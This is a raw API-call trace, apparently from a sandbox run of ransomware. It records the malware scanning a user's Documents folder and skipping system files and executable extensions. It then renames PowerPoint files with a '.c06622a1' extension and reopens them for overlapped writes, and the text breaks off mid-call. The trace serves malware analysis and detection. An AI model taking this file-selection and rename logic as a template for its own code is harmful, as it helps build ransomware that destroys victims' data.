0x6c7ceab6 [0157.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x66ae95ae [0157.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x65979188 [0157.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x33bfd9f9 [0157.630] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x8295643 [0157.633] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x78d4a573 [0157.633] RtlComputeCrc32 (PartialCrc=0xa573, Buffer=0x2b70094, Length=0x80) returned 0x149da730 [0157.633] RtlComputeCrc32 (PartialCrc=0xa730, Buffer=0x2b70094, Length=0x80) returned 0xceceffef [0157.633] RtlComputeCrc32 (PartialCrc=0xffef, Buffer=0x2b70094, Length=0x80) returned 0xe9722d7a [0157.633] RtlComputeCrc32 (PartialCrc=0x2d7a, Buffer=0x2b70094, Length=0x80) returned 0xad9123f0 [0157.633] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0157.633] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.634] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.635] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.635] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0157.635] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0157.635] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0157.635] wcslen (_String="autorun.inf") returned 0xb [0157.635] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0157.635] wcslen (_String="boot.ini") returned 0x8 [0157.635] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0157.636] wcslen (_String="bootfont.bin") returned 0xc [0157.636] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0157.636] wcslen (_String="bootsect.bak") returned 0xc [0157.636] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0157.636] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbd8c310, ftCreationTime.dwHighDateTime=0x1d5c830, ftLastAccessTime.dwLowDateTime=0xf5645510, ftLastAccessTime.dwHighDateTime=0x1d5ab59, ftLastWriteTime.dwLowDateTime=0xf5645510, ftLastWriteTime.dwHighDateTime=0x1d5ab59, nFileSizeHigh=0x0, nFileSizeLow=0x511e, dwReserved0=0x0, dwReserved1=0x0, cFileName="dK4taQOW3BPX.pptx", cAlternateFileName="DK4TAQ~1.PPT")) returned 1 [0157.636] _wcsicmp (_Str1="dK4taQOW3BPX.pptx", _Str2="README.c06622a1.TXT") returned -14 [0157.636] wcsstr (_Str="dK4taQOW3BPX.pptx", _SubStr="README") returned 0x0 [0157.636] _wcsicmp (_Str1="autorun.inf", _Str2="dK4taQOW3BPX.pptx") returned -3 [0157.636] wcslen (_String="autorun.inf") returned 0xb [0157.636] _wcsicmp (_Str1="boot.ini", _Str2="dK4taQOW3BPX.pptx") returned -2 [0157.636] wcslen (_String="boot.ini") returned 0x8 [0157.636] _wcsicmp (_Str1="bootfont.bin", _Str2="dK4taQOW3BPX.pptx") returned -2 [0157.636] wcslen (_String="bootfont.bin") returned 0xc [0157.636] _wcsicmp (_Str1="bootsect.bak", _Str2="dK4taQOW3BPX.pptx") returned -2 [0157.636] wcslen (_String="bootsect.bak") returned 0xc [0157.636] _wcsicmp (_Str1="desktop.ini", _Str2="dK4taQOW3BPX.pptx") returned -6 [0157.636] wcslen (_String="desktop.ini") returned 0xb [0157.636] _wcsicmp (_Str1="iconcache.db", _Str2="dK4taQOW3BPX.pptx") returned 5 [0157.636] wcslen (_String="iconcache.db") returned 0xc [0157.636] _wcsicmp (_Str1="ntldr", _Str2="dK4taQOW3BPX.pptx") returned 10 [0157.636] wcslen (_String="ntldr") returned 0x5 [0157.636] _wcsicmp (_Str1="ntuser.dat", _Str2="dK4taQOW3BPX.pptx") returned 10 [0157.636] wcslen (_String="ntuser.dat") returned 0xa [0157.636] _wcsicmp (_Str1="ntuser.dat.log", _Str2="dK4taQOW3BPX.pptx") returned 10 [0157.636] wcslen (_String="ntuser.dat.log") returned 0xe [0157.636] _wcsicmp (_Str1="ntuser.ini", _Str2="dK4taQOW3BPX.pptx") returned 10 [0157.636] wcslen (_String="ntuser.ini") returned 0xa [0157.636] _wcsicmp (_Str1="thumbs.db", _Str2="dK4taQOW3BPX.pptx") returned 16 [0157.636] wcslen (_String="thumbs.db") returned 0x9 [0157.636] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0157.636] wcslen (_String="386") returned 0x3 [0157.636] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0157.637] wcslen (_String="adv") returned 0x3 [0157.637] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0157.637] wcslen (_String="ani") returned 0x3 [0157.637] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0157.637] wcslen (_String="bat") returned 0x3 [0157.637] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0157.637] wcslen (_String="bin") returned 0x3 [0157.637] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0157.637] wcslen (_String="cab") returned 0x3 [0157.637] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0157.637] wcslen (_String="cmd") returned 0x3 [0157.637] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0157.637] wcslen (_String="com") returned 0x3 [0157.637] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0157.637] wcslen (_String="cpl") returned 0x3 [0157.637] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0157.637] wcslen (_String="cur") returned 0x3 [0157.637] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0157.637] wcslen (_String="deskthemepack") returned 0xd [0157.637] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0157.637] wcslen (_String="diagcab") returned 0x7 [0157.637] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0157.637] wcslen (_String="diagcfg") returned 0x7 [0157.637] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0157.637] wcslen (_String="diagpkg") returned 0x7 [0157.637] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0157.637] wcslen (_String="dll") returned 0x3 [0157.637] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0157.637] wcslen (_String="drv") returned 0x3 [0157.638] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0157.638] wcslen (_String="exe") returned 0x3 [0157.638] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0157.638] wcslen (_String="hlp") returned 0x3 [0157.638] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0157.638] wcslen (_String="icl") returned 0x3 [0157.638] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0157.638] wcslen (_String="icns") returned 0x4 [0157.638] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0157.638] wcslen (_String="ico") returned 0x3 [0157.638] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0157.638] wcslen (_String="ics") returned 0x3 [0157.638] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0157.638] wcslen (_String="idx") returned 0x3 [0157.638] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0157.638] wcslen (_String="ldf") returned 0x3 [0157.638] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0157.638] wcslen (_String="lnk") returned 0x3 [0157.638] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0157.638] wcslen (_String="mod") returned 0x3 [0157.638] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0157.638] wcslen (_String="mpa") returned 0x3 [0157.638] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0157.638] wcslen (_String="msc") returned 0x3 [0157.638] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0157.639] wcslen (_String="msp") returned 0x3 [0157.639] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0157.639] wcslen (_String="msstyles") returned 0x8 [0157.639] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0157.639] wcslen (_String="msu") returned 0x3 [0157.639] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0157.639] wcslen (_String="nls") returned 0x3 [0157.639] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0157.639] wcslen (_String="nomedia") returned 0x7 [0157.639] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0157.639] wcslen (_String="ocx") returned 0x3 [0157.639] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0157.639] wcslen (_String="prf") returned 0x3 [0157.639] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0157.639] wcslen (_String="ps1") returned 0x3 [0157.639] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0157.639] wcslen (_String="rom") returned 0x3 [0157.639] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0157.639] wcslen (_String="rtp") returned 0x3 [0157.639] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0157.639] wcslen (_String="scr") returned 0x3 [0157.640] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0157.640] wcslen (_String="shs") returned 0x3 [0157.640] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0157.640] wcslen (_String="spl") returned 0x3 [0157.640] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0157.640] wcslen (_String="sys") returned 0x3 [0157.640] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0157.640] wcslen (_String="theme") returned 0x5 [0157.640] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0157.640] wcslen (_String="themepack") returned 0x9 [0157.640] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0157.640] wcslen (_String="wpx") returned 0x3 [0157.640] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0157.640] wcslen (_String="lock") returned 0x4 [0157.640] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0157.640] wcslen (_String="key") returned 0x3 [0157.640] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0157.640] wcslen (_String="hta") returned 0x3 [0157.640] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0157.640] wcslen (_String="msi") returned 0x3 [0157.640] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0157.640] wcslen (_String="pdb") returned 0x3 [0157.641] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0157.641] wcslen (_String="sqlite") returned 0x6 [0157.641] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.641] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.641] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.641] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.641] wcscpy (in: _Dest=0x32100a0, _Source="dK4taQOW3BPX.pptx" | out: _Dest="dK4taQOW3BPX.pptx") returned="dK4taQOW3BPX.pptx" [0157.641] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dK4taQOW3BPX.pptx", dwFileAttributes=0x80) returned 1 [0157.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dK4taQOW3BPX.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dk4taqow3bpx.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0157.642] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.642] ReadFile (in: hFile=0x1a4, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.642] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x7bbfa082 [0157.642] RtlComputeCrc32 (PartialCrc=0xa082, Buffer=0x32ec24, Length=0x80) returned 0x35abadf5 [0157.643] RtlComputeCrc32 (PartialCrc=0xadf5, Buffer=0x32ec24, Length=0x80) returned 0x19853182 [0157.643] RtlComputeCrc32 (PartialCrc=0x3182, Buffer=0x32ec24, Length=0x80) returned 0xd1fd4d14 [0157.643] RtlComputeCrc32 (PartialCrc=0x4d14, Buffer=0x32ec24, Length=0x80) returned 0x429b0243 [0157.643] CloseHandle (hObject=0x1a4) returned 1 [0157.643] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.643] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dK4taQOW3BPX.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dK4taQOW3BPX.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dK4taQOW3BPX.pptx" [0157.643] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dK4taQOW3BPX.pptx") returned 0x3d [0157.643] wcscpy (in: _Dest=0x32200ca, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.643] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dK4taQOW3BPX.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dk4taqow3bpx.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dK4taQOW3BPX.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dk4taqow3bpx.pptx.c06622a1"), dwFlags=0x8) returned 1 [0157.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dK4taQOW3BPX.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dk4taqow3bpx.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a4 [0157.648] CreateIoCompletionPort (FileHandle=0x1a4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0157.648] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3480020 [0157.655] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x124a9040 [0157.655] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1864325b [0157.655] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x28e5431e [0157.655] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x64dadd36 [0157.655] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5ec303e7 [0157.655] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x41dc83d7 [0157.656] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3841c610 [0157.656] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3d153fbf [0157.659] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3480094, Length=0x80) returned 0x3544f484 [0157.659] RtlComputeCrc32 (PartialCrc=0xf484, Buffer=0x3480094, Length=0x80) returned 0x90bc04 [0157.659] RtlComputeCrc32 (PartialCrc=0xbc04, Buffer=0x3480094, Length=0x80) returned 0xbf807a77 [0157.659] RtlComputeCrc32 (PartialCrc=0x7a77, Buffer=0x3480094, Length=0x80) returned 0x54bc4899 [0157.659] RtlComputeCrc32 (PartialCrc=0x4899, Buffer=0x3480094, Length=0x80) returned 0xa371aaf5 [0157.659] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0157.659] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.660] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.661] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2335950, ftCreationTime.dwHighDateTime=0x1d5dffe, ftLastAccessTime.dwLowDateTime=0x16ecf500, ftLastAccessTime.dwHighDateTime=0x1d5e21b, ftLastWriteTime.dwLowDateTime=0x16ecf500, ftLastWriteTime.dwHighDateTime=0x1d5e21b, nFileSizeHigh=0x0, nFileSizeLow=0xda4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eZ6Mr_pLus.pps", cAlternateFileName="EZ6MR_~1.PPS")) returned 1 [0157.661] _wcsicmp (_Str1="eZ6Mr_pLus.pps", _Str2="README.c06622a1.TXT") returned -13 [0157.661] wcsstr (_Str="eZ6Mr_pLus.pps", _SubStr="README") returned 0x0 [0157.661] _wcsicmp (_Str1="autorun.inf", _Str2="eZ6Mr_pLus.pps") returned -4 [0157.661] wcslen (_String="autorun.inf") returned 0xb [0157.661] _wcsicmp (_Str1="boot.ini", _Str2="eZ6Mr_pLus.pps") returned -3 [0157.661] wcslen (_String="boot.ini") returned 0x8 [0157.661] _wcsicmp (_Str1="bootfont.bin", _Str2="eZ6Mr_pLus.pps") returned -3 [0157.661] wcslen (_String="bootfont.bin") returned 0xc [0157.661] _wcsicmp (_Str1="bootsect.bak", _Str2="eZ6Mr_pLus.pps") returned -3 [0157.661] wcslen (_String="bootsect.bak") returned 0xc [0157.661] _wcsicmp (_Str1="desktop.ini", _Str2="eZ6Mr_pLus.pps") returned -1 [0157.661] wcslen (_String="desktop.ini") returned 0xb [0157.661] _wcsicmp (_Str1="iconcache.db", _Str2="eZ6Mr_pLus.pps") returned 4 [0157.662] wcslen (_String="iconcache.db") returned 0xc [0157.662] _wcsicmp (_Str1="ntldr", _Str2="eZ6Mr_pLus.pps") returned 9 [0157.662] wcslen (_String="ntldr") returned 0x5 [0157.662] _wcsicmp (_Str1="ntuser.dat", _Str2="eZ6Mr_pLus.pps") returned 9 [0157.662] wcslen (_String="ntuser.dat") returned 0xa [0157.662] _wcsicmp (_Str1="ntuser.dat.log", _Str2="eZ6Mr_pLus.pps") returned 9 [0157.662] wcslen (_String="ntuser.dat.log") returned 0xe [0157.662] _wcsicmp (_Str1="ntuser.ini", _Str2="eZ6Mr_pLus.pps") returned 9 [0157.662] wcslen (_String="ntuser.ini") returned 0xa [0157.662] _wcsicmp (_Str1="thumbs.db", _Str2="eZ6Mr_pLus.pps") returned 15 [0157.662] wcslen (_String="thumbs.db") returned 0x9 [0157.662] _wcsicmp (_Str1="386", _Str2="pps") returned -61 [0157.662] wcslen (_String="386") returned 0x3 [0157.662] _wcsicmp (_Str1="adv", _Str2="pps") returned -15 [0157.662] wcslen (_String="adv") returned 0x3 [0157.662] _wcsicmp (_Str1="ani", _Str2="pps") returned -15 [0157.662] wcslen (_String="ani") returned 0x3 [0157.662] _wcsicmp (_Str1="bat", _Str2="pps") returned -14 [0157.662] wcslen (_String="bat") returned 0x3 [0157.662] _wcsicmp (_Str1="bin", _Str2="pps") returned -14 [0157.662] wcslen (_String="bin") returned 0x3 [0157.662] _wcsicmp (_Str1="cab", _Str2="pps") returned -13 [0157.662] wcslen (_String="cab") returned 0x3 [0157.662] _wcsicmp (_Str1="cmd", _Str2="pps") returned -13 [0157.662] wcslen (_String="cmd") returned 0x3 [0157.662] _wcsicmp (_Str1="com", _Str2="pps") returned -13 [0157.662] wcslen (_String="com") returned 0x3 [0157.663] _wcsicmp (_Str1="cpl", _Str2="pps") returned -13 [0157.663] wcslen (_String="cpl") returned 0x3 [0157.663] _wcsicmp (_Str1="cur", _Str2="pps") returned -13 [0157.663] wcslen (_String="cur") returned 0x3 [0157.663] _wcsicmp (_Str1="deskthemepack", _Str2="pps") returned -12 [0157.663] wcslen (_String="deskthemepack") returned 0xd [0157.663] _wcsicmp (_Str1="diagcab", _Str2="pps") returned -12 [0157.663] wcslen (_String="diagcab") returned 0x7 [0157.663] _wcsicmp (_Str1="diagcfg", _Str2="pps") returned -12 [0157.663] wcslen (_String="diagcfg") returned 0x7 [0157.663] _wcsicmp (_Str1="diagpkg", _Str2="pps") returned -12 [0157.663] wcslen (_String="diagpkg") returned 0x7 [0157.663] _wcsicmp (_Str1="dll", _Str2="pps") returned -12 [0157.663] wcslen (_String="dll") returned 0x3 [0157.663] _wcsicmp (_Str1="drv", _Str2="pps") returned -12 [0157.663] wcslen (_String="drv") returned 0x3 [0157.663] _wcsicmp (_Str1="exe", _Str2="pps") returned -11 [0157.663] wcslen (_String="exe") returned 0x3 [0157.663] _wcsicmp (_Str1="hlp", _Str2="pps") returned -8 [0157.663] wcslen (_String="hlp") returned 0x3 [0157.663] _wcsicmp (_Str1="icl", _Str2="pps") returned -7 [0157.663] wcslen (_String="icl") returned 0x3 [0157.663] _wcsicmp (_Str1="icns", _Str2="pps") returned -7 [0157.663] wcslen (_String="icns") returned 0x4 [0157.663] _wcsicmp (_Str1="ico", _Str2="pps") returned -7 [0157.663] wcslen (_String="ico") returned 0x3 [0157.663] _wcsicmp (_Str1="ics", _Str2="pps") returned -7 [0157.663] wcslen (_String="ics") returned 0x3 [0157.663] _wcsicmp (_Str1="idx", _Str2="pps") returned -7 [0157.663] wcslen (_String="idx") returned 0x3 [0157.664] _wcsicmp (_Str1="ldf", _Str2="pps") returned -4 [0157.664] wcslen (_String="ldf") returned 0x3 [0157.664] _wcsicmp (_Str1="lnk", _Str2="pps") returned -4 [0157.664] wcslen (_String="lnk") returned 0x3 [0157.664] _wcsicmp (_Str1="mod", _Str2="pps") returned -3 [0157.664] wcslen (_String="mod") returned 0x3 [0157.664] _wcsicmp (_Str1="mpa", _Str2="pps") returned -3 [0157.664] wcslen (_String="mpa") returned 0x3 [0157.664] _wcsicmp (_Str1="msc", _Str2="pps") returned -3 [0157.664] wcslen (_String="msc") returned 0x3 [0157.664] _wcsicmp (_Str1="msp", _Str2="pps") returned -3 [0157.664] wcslen (_String="msp") returned 0x3 [0157.664] _wcsicmp (_Str1="msstyles", _Str2="pps") returned -3 [0157.664] wcslen (_String="msstyles") returned 0x8 [0157.664] _wcsicmp (_Str1="msu", _Str2="pps") returned -3 [0157.664] wcslen (_String="msu") returned 0x3 [0157.664] _wcsicmp (_Str1="nls", _Str2="pps") returned -2 [0157.664] wcslen (_String="nls") returned 0x3 [0157.664] _wcsicmp (_Str1="nomedia", _Str2="pps") returned -2 [0157.664] wcslen (_String="nomedia") returned 0x7 [0157.664] _wcsicmp (_Str1="ocx", _Str2="pps") returned -1 [0157.664] wcslen (_String="ocx") returned 0x3 [0157.664] _wcsicmp (_Str1="prf", _Str2="pps") returned 2 [0157.664] wcslen (_String="prf") returned 0x3 [0157.664] _wcsicmp (_Str1="ps1", _Str2="pps") returned 3 [0157.664] wcslen (_String="ps1") returned 0x3 [0157.664] _wcsicmp (_Str1="rom", _Str2="pps") returned 2 [0157.664] wcslen (_String="rom") returned 0x3 [0157.664] _wcsicmp (_Str1="rtp", _Str2="pps") returned 2 [0157.665] wcslen (_String="rtp") returned 0x3 [0157.665] _wcsicmp (_Str1="scr", _Str2="pps") returned 3 [0157.665] wcslen (_String="scr") returned 0x3 [0157.665] _wcsicmp (_Str1="shs", _Str2="pps") returned 3 [0157.665] wcslen (_String="shs") returned 0x3 [0157.665] _wcsicmp (_Str1="spl", _Str2="pps") returned 3 [0157.665] wcslen (_String="spl") returned 0x3 [0157.665] _wcsicmp (_Str1="sys", _Str2="pps") returned 3 [0157.665] wcslen (_String="sys") returned 0x3 [0157.665] _wcsicmp (_Str1="theme", _Str2="pps") returned 4 [0157.665] wcslen (_String="theme") returned 0x5 [0157.665] _wcsicmp (_Str1="themepack", _Str2="pps") returned 4 [0157.665] wcslen (_String="themepack") returned 0x9 [0157.665] _wcsicmp (_Str1="wpx", _Str2="pps") returned 7 [0157.665] wcslen (_String="wpx") returned 0x3 [0157.665] _wcsicmp (_Str1="lock", _Str2="pps") returned -4 [0157.665] wcslen (_String="lock") returned 0x4 [0157.665] _wcsicmp (_Str1="key", _Str2="pps") returned -5 [0157.665] wcslen (_String="key") returned 0x3 [0157.665] _wcsicmp (_Str1="hta", _Str2="pps") returned -8 [0157.665] wcslen (_String="hta") returned 0x3 [0157.665] _wcsicmp (_Str1="msi", _Str2="pps") returned -3 [0157.665] wcslen (_String="msi") returned 0x3 [0157.665] _wcsicmp (_Str1="pdb", _Str2="pps") returned -12 [0157.665] wcslen (_String="pdb") returned 0x3 [0157.665] _wcsicmp (_Str1="sqlite", _Str2="pps") returned 3 [0157.666] wcslen (_String="sqlite") returned 0x6 [0157.666] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.666] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.666] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.666] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.666] wcscpy (in: _Dest=0x32100a0, _Source="eZ6Mr_pLus.pps" | out: _Dest="eZ6Mr_pLus.pps") returned="eZ6Mr_pLus.pps" [0157.666] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eZ6Mr_pLus.pps", dwFileAttributes=0x80) returned 1 [0157.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eZ6Mr_pLus.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ez6mr_plus.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0157.666] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.666] ReadFile (in: hFile=0x1cc, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.667] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x4687f83d [0157.667] RtlComputeCrc32 (PartialCrc=0xf83d, Buffer=0x32ec24, Length=0x80) returned 0x94131ac5 [0157.667] RtlComputeCrc32 (PartialCrc=0x1ac5, Buffer=0x32ec24, Length=0x80) returned 0x48ed86d6 [0157.667] RtlComputeCrc32 (PartialCrc=0x86d6, Buffer=0x32ec24, Length=0x80) returned 0x29028c09 [0157.667] RtlComputeCrc32 (PartialCrc=0x8c09, Buffer=0x32ec24, Length=0x80) returned 0x64701ffe [0157.667] CloseHandle (hObject=0x1cc) returned 1 [0157.667] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.667] wcscpy (in: _Dest=0x3220050, 